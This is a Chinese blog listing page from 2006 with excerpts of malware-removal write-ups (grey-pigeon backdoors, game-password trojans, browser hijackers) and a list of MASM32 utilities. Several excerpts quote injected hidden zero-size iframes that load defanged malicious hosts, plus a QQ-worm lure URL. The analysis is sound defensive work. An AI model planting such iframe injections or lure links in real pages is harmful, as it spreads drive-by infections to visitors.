- 博客(27)
- 资源 (53)
- 问答 (1)
- 收藏
- 关注
原创 遭遇灰鸽子2006、魔兽盗号木马等
endurer 原创2006-08-31 第1版有一位网友的电脑,双击桌面图标,显示出来的却是图标的属性窗口。瑞星实时监控也无法打开。使用HijackThis(可以到 hxxp://endurer.ys168.com 下载)扫描log,发现可疑项:-----------Logfile of HijackThis v1.99.1Scan saved at 17:01:15, on 200
2006-08-31 13:50:00 2030 1
原创 [09-05] 解决www.71791.com 浏览器劫持问题
endurer 原创2006-09-05 第2版2006-08-30 第1版有一位网友的电脑,不定期弹出 hxxp://www.71791.com 等广告窗口。使用HijackThis(可以到 http://endurer.ys168.com 下载)扫描log,发现可疑项:/-----------Logfile of HijackThis v1.99.1Scan saved at 21
2006-08-30 14:47:00 2653
原创 下载baidu等流氓软件/插件的SmartNet.exe
endurer 原创2006-08-29 第1版在 又是流氓软件/插件惹的祸 一文中,我们发现:/-----------------------O23 - Service: Smart Nets - Unknown owner - C:/WINDOWS/system32/SmartNet.exe-----------------------/SmartNet.exe 采用 Microso
2006-08-30 00:40:00 2149
原创 又是流氓软件/插件惹的祸
endurer 原创2006-08-28 第1版有网友反应,他的电脑莫莫名其妙地出现了好多流氓软件/插件,昨天卸了,今天又有了,还弄得电脑上不了网。使用HijackThis(可以到 hxxp://endurer.ys168.com 下载)扫描log,发现可疑项:/-----------2 - REG:system.ini: UserInit=C:/WINDOWS/system32/us
2006-08-28 23:33:00 4389 2
原创 干掉了一个灰鸽子/Backdoor.Gpigeon.uql变种
endurer 原创2006-08-28 第1版一位网友的电脑,这两天瑞星开机扫描总报告发现 Backdoor.Gpigeon.uql。如:/-----------病毒名称 处理结果 发现日期 路径文件病毒来源Backdoor.Gpigeon.uql 清除成功 2006-08-27 11:18 IEXPLORE.EXE>>C:/Program Files/Internet Explore
2006-08-28 14:24:00 5737
原创 顽固的灰鸽子 Backdoor.Gpigeon.uql 变种 Backdoor.Win32.Hupigon.cda
endurer 原创2006-08-26 第1版一位网友的电脑,这两天瑞星开机扫描总报告发现 Backdoor.Gpigeon.uql。如:-----------病毒名称 处理结果 发现日期 路径文件病毒来源Backdoor.Gpigeon.uql 清除成功 2006-08-25 08:19 IEXPLORE.EXE>>C:/Program Files/Internet Explorer/I
2006-08-26 16:38:00 4139
翻译 [译] Windows rootkits 101
Windows rootkits 101by Michael Mullins CCNA, MCP作者:Michael Mullins CCNA(Cisco Certified Networking Associate,Cisco网络认证工程师),MCP(Microsoft Certified Professionals,微软认证专家)翻译:endurer 2006-08-16 第1版
2006-08-24 23:18:00 1473
原创 阻击 瑞星 和 雅虎助手 的 SVOHOST.exe(第2版)
endurer 原创2006-08-24 第2版 补充瑞星的反应。2006-08-23 第1版有网友反映,他电脑上的瑞星实时监控小伞突然消失,手动启动实时监控也不显示;启动瑞星杀毒程序时窗口无显示,只显示瑞星杀毒助手;瑞星文件的属性窗口一显示就自动关闭。通过QQ远程协助,到 http://endurer.ys168.com 下载 HijackThis 和 ProcView。用Hija
2006-08-23 21:52:00 4273 2
原创 解决浏览器被 http://www.haohao1.com 劫持问题(第2版)
endurer 原创2006-08-23 第1版有网友的电脑中的IE首页被强制设置为 hxxp://www.haohao1.com。使用HijackThis(可以到 http://endurer.ys168.com 下载)扫描log,发现一个可疑项:/------------F2 - REG:system.ini: UserInit=C:/WINDOWS/system32/userin
2006-08-23 20:55:00 7283
原创 又一个下载恶意文件的政府网站
endurer 原创2006-08-22 第1版 首页有3处地方被加入:/--------<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>--------/hxxp://***object.cnic**b.com/15 的内容为插入许多空格的JavaScript脚本,利用 Microso
2006-08-22 23:04:00 3285
原创 木马windowout.exe
endurer 原创2006-08-22 第1版windowout.exe (133,126 字节)是 木马MicrosoftSQL.exe(Trojan.DL.VB.cap/Win32.VB.ajb) 下载的文件之一,它会 释放/下载文件:msinet.ocx(116,736 字节)setup_01.exe(瑞星报为 Trojan.DL.QQHelper.eo)outme.exe
2006-08-22 22:41:00 1648
原创 两个下载恶意程序文件的政府网站换花样了
endurer 原创2006-08-22 第1版今天又看了看 两个会自动下载恶意程序文件的政府网站 一文中的两个网站,发现换了花样。两个网站首页末均被加入:/---------<iframe src="hxxp://www.wzx***qy.com/" width="0" height="0" frameborder="no" border="0" marginwidth="0"
2006-08-22 12:31:00 3073
原创 roogoo发布的quartz32.dll让浏览器不断弹出广告窗口
endurer 原创2006-08-21 第1版有网友反映:他的电脑,不管用什么浏览器上网,总是会弹出奇怪的网页,什么都有。而且不是开网页时弹网页,是开了浏览器就弹,过一会弹一个,有时开个空白页都弹。 用HijackThis扫描log,发现如下可疑项目:/---------O1 - Hosts: 127.255.255.255 serial.alcohol-soft.com O1 -
2006-08-22 12:22:00 2463 6
原创 一个下载木马的网站
endurer 原创2006-08-21 第1版网站首页插入如下代码:/------------<iframe src="hxxp://www.ac***66.cn/8***8/index.htm" width="0" height="0" frameborder="0"></iframe>------------/hxxp://www.ac***66.cn/8***8/index.h
2006-08-21 13:43:00 2436 1
原创 清除了灰鸽子新变种、几个广告程序
endurer 原创2006-08-20 第1版一位网友的电脑,这两天瑞星开机扫描总报告发现Backdoor.Gpigeon.uql。如:/------------病毒名称 处理结果 发现日期 路径文件病毒来源Backdoor.Gpigeon.uql 清除成功 2006-08-19 13:58 IEXPLORE.EXE>>C:/Program Files/Internet Explorer/
2006-08-20 22:16:00 1631
原创 两个会自动下载恶意程序文件的政府网站
endurer 原创2006-08-18 第1版打开这两个网站时,Kaspersky 提示发现 Exploit.JS.ADODB.stream.e。第一个网站 hxxp://www.jing***.gov.cn的首页加入代码:--------<TR><script language=javascript src=bbs.js></script><TD vAlign=top align=
2006-08-18 23:42:00 4150
原创 木马MicrosoftSQL.exe(Trojan-Downloader.Win32.VB.ajb/Trojan.DL.VB.cap)
endurer 原创2006-08-18 第1版 有网友反映,他所在的公司的局域网上的所有电脑中的共享文档都会生成MicrosoftSQL.exe,用瑞星未查杀,删除又会生成。并把MicrosoftSQL.exe发给我。 看了一下,文件MicrosoftSQL.exe(Kaspersky 报为 Trojan-Downloader.Win32.VB.ajb,瑞星报为Trojan.DL.V
2006-08-18 14:18:00 1808
原创 解决灰鸽子变种、Rootkit.Win32.Vanti、Win32.Delf、Win32.Small等
endurer 原创2006-08-17 第1版一位网友的电脑,这两天瑞星开机扫描总报告发现Backdoor.Gpigeon.uql。如:/------------病毒名称 处理结果 发现日期 路径文件病毒来源Backdoor.Gpigeon.uql 清除成功 2006-08-15 18:08 IEXPLORE.EXE>>C:/Program Files/Internet Explorer/
2006-08-17 21:35:00 3154
原创 双击桌面上的IE图标却提示找不到文件iexplore.com的解决办法
endurer 原创2006-08-16 第1版一位网友的电脑,查杀病毒后,双击桌面上的IE图标却弹出对话框,提示找不到文件iexplore.com。估计是中了Trojan.PSW.Lmir、Trojan.PSW.Misc之类的网游盗号木马,注册表的有关键值被修改了。通过QQ远程协助。打开注册表编辑器,搜索:iexplore.com将找到的项目的值中的 iexplore.com
2006-08-16 21:57:00 3447
原创 遭遇RootKit.Vanti.kn、Trojan.PSW.JHOnline.eqo、Trojan.PSW.LMir.ktn等
endurer 原创2006-08-16 第1版有一位网友电脑这几天瑞星总报告发现RootKit.Vanti.kn、Trojan.PSW.JHOnline.eqo、Trojan.PSW.LMir.ktn等病毒,请偶帮忙看看。先运行瑞星注册表修复工具,没有发现被修改的项目。然后检查瑞星的杀毒历史,打开瑞星注窗口,发现瑞星病毒库还是8月10日的,立即升级。再检查瑞星的定时升级设置,升级频率
2006-08-16 12:06:00 1752
原创 干掉了一只灰鸽子/Backdoor.Gpigeon.uql新变种
endurer 原创2006-08-13 第1版一位网友的电脑,这两天瑞星开机扫描总报告发现Backdoor.Gpigeon.uql。如:------------病毒名称 处理结果 发现日期 路径文件病毒来源Backdoor.Gpigeon.uql 清除成功 2006-08-13 10:08 IEXPLORE.EXE>>C:/Program Files/Internet Explorer
2006-08-13 23:26:00 1330
原创 再战Trojan.PSW.Lmir.kuo、Trojan.PSW.Misc.kcc等网游盗号木马(第2版)
endurer 原创2006-08-13 第2版 补充一个漏网的2006-08-12 第1版 今早一上网,就有网友求助。他电脑屏幕右下角的瑞星实时监控小伞图标不见了,手动启动也不行。 通过QQ远程协助,先运行 瑞星注册表修复工具,发现 EXE文件关联 和 系统启动项(即下面HijackThis的log中的F2项) 被修改了。 到 http://endurer.ys168.co
2006-08-12 11:53:00 1633
原创 又干掉了一只灰鸽子/Backdoor.Gpigeon.uql新变种
endurer 原创2006-08-11 第1版一位网友的电脑,这几天瑞星开机扫描总报告发现Backdoor.Gpigeon.uql。如:------------病毒名称 处理结果 发现日期 路径文件病毒来源Backdoor.Gpigeon.uql 清除成功 2006-08-11 08:08 IEXPLORE.EXE>>C:/Program Files/Internet Explorer
2006-08-11 21:11:00 3142 3
原创 遭遇木马Trojan.PSW.ZhengTu.dm、Trojan.PSW.LMir.atb
endurer 原创2006-08-10 第1版刚才一位网友的电脑开机时,瑞星开机扫描发现病毒:Trojan.PSW.ZhengTu.dm、Trojan.PSW.LMir.atb,接着瑞星监控小伞变红,无法开启所有监控。请我帮忙看看。检查瑞星历史记录:----------------C:/TCNEWTCNEW.DLL Trojan.PSW.ZhengTu.dmC:/DOCUME~1/abc
2006-08-10 23:38:00 2069
原创 收到QQ尾巴 Worm.QQ.TopFox.bo 送来的“我的近照11.zip”
endurer 原创2006-08-08 第1版一位网友的电脑中了QQ尾巴,自动发送文件“我的近照11.zip”。“我的近照11.zip”中包含一个文件:----------------我的近照11.jpg
2006-08-08 23:04:00 1425
原创 小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r
endurer 原创2006-08-01 第1版一个网友的电脑中了QQ尾巴,打开QQ好友的对话框就会自动发出如下信息:---------------------------------麻烦帮我朋友投个票啦!她正在竞选QQ小姐,参选Q-Zone空间上有她近照,点击为她增加人气,先谢谢喽……hxxp://Q-Zone.****qq.C0M.%62%30%76%2E%63%6E/cgi-
2006-08-02 01:30:00 9137
原创 [08-01] 再斩灰鸽子Backdoor.Gpigeon.uql新变种(第3版)
endurer 原创2006-07-31 第3版补充杀毒软件的反应。2006-07-30 第2版补充杀毒软件的反应。2006-07-29 第1版昨天,有位网友的说,他电脑上的瑞星开机自动扫描总报告:-----------Backdoor.Gpigeon.uql 清除成功 2006-07-28 16:01 IEXPLORE.EXE>>C:/Program
2006-08-01 15:24:00 1545
MASM32编程通过WMI获取Windows用户帐户信息的控制台程序,小巧精炼,适合bat调用,重定向输出
2023-09-03
HTML+JavaScript+CSS DIY 分隔条splitter代码
2023-09-02
sysInfo(电脑系统信息)
2023-05-29
TcpStatC-增加显示PID和对应进程文件说明符
2022-08-14
TcpStatC.zip
2022-07-31
MASM32v11中的kernl32p.inc和kernl32p.lib存在bug,这是修正后的版本。
2022-07-30
MASM32v11版本中kernel32.inc和Kernel32.lib修正版。
2022-07-30
sysInfo-0_0_0001.zip
2021-11-04
Word启动故障修复程序FixWord
2017-01-16
MASM32编程实现运行时自动提示要求以管理员帐户来运行的演示源代码和exe
2017-01-05
用MASM32来DIY判断字符串1是否为字符串2的子串的函数演示代码(源码+exe)(应用lstrcmp,区分大小写)
2014-10-16
用MASM32来DIY一个判断字符串1是否为字符串2的子串的函数演示代码(源码+exe)(应用repe cmpsb指令,区分大小写)
2014-10-04
添加浮动按钮点击滚动到网页底部的纯JavaScript演示代码
2014-09-06
用MASM32写的 系统托盘图标管理员 TrayIconMan 0.0.0003
2012-02-17
定时关机、重启、注销、待机、修眠程序ClosePC 0.0.0.1 beta4
2011-08-04
用MASM32编写的网络时间同步/校正程序-adjTime.exe
2011-06-11
查看备份系统开/关机&用户登录/注销记录BootClos 0_0_0001_beta2
2011-05-26
BootClos 0.0.0001 beta1—查看、备份系统开关机记录
2011-05-21
DelUninstall_0_0_0001Beta4
2011-01-16
Speaker——用MASM32编写的文本朗读程序(7KB)
2010-07-24
MASM32编程通过WMI获取杀毒软件信息(源代码+exe)
2010-05-24
MASM32编程通过WMI获取Windows计划任务(源代码+EXE下载)
2010-04-19
用MASM32写的定时关机、重启、注销程序ClosePC 0.0.0.1beta1
2010-03-06
MASM32编程由WMI获取BIOS、主板、硬盘、CPU、网卡的信息(源代码+exe)
2009-10-21
FileInfo 0.0.0012
2009-10-09
DelUninstall_0_0_0001Beta3
2009-06-02
分析、获取命令行参数的MASM32演示程序
2009-04-16
IEFO_Man 0.0.0.1 beta1(映像劫持项目管理程序)
2009-03-03
MASM32编程获取任务栏高度
2008-09-21
FileInfo 0.0.0011
2008-07-17
FileInfo 0.0.0010 --修正bug,提升速度
2008-06-29
FileInfo 0.0.0009 -- 增强文件数字签名的检测
2008-06-09
FileInfo 0.0.0008
2008-05-31
FileInfo 0.0.0007
2008-05-01
HttpRead-0_0_0001-Beta4
2008-04-16
Windows 10 计算器 显示的是多少?
2022-07-31
TA创建的收藏夹 TA关注的收藏夹
TA关注的人